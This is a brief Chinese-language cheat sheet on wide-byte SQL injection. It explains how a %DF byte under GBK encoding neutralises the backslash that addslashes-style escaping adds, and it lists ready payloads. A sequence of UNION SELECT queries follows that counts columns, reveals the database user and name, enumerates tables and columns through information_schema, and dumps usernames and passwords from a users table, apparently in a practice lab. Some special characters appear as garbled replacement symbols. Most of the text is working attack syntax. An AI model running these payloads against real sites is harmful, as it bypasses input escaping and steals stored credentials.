宽字节注入中常用的特殊字符: 
%df
�'
�'
由于汉字编码普遍使用的是GBK编码,而这种编码是一次性读两个字节,利用这个特点就可以实现宽字节注入。
宽字节注入是针对addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc等转义函数的注入

其原理是将转义符号\与%DF组合成一个汉字,使其失去效用

注入语句:

%DF' union select 1,2,3 -- -
�' union select 1,2,3 -- -
�' union select 1,2,3 -- -

特殊符号后可接其他sql注入基本语句

作用过程:

$id = %DF ’ # → 自动转义 %df\’ # → 11011111 01011100 00100111 → 運’ #

sql注入基本语句: 
order by 4 ­­ ­
判断有多少列

union select 1,2,3 ­­ ­
判断数据显示点

union select 1,user(),database()­­ 
­显示出登录用户和数据库名

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 
查看数据库有哪些表

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 
查看对应表有哪些列

union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
查看账号密码信息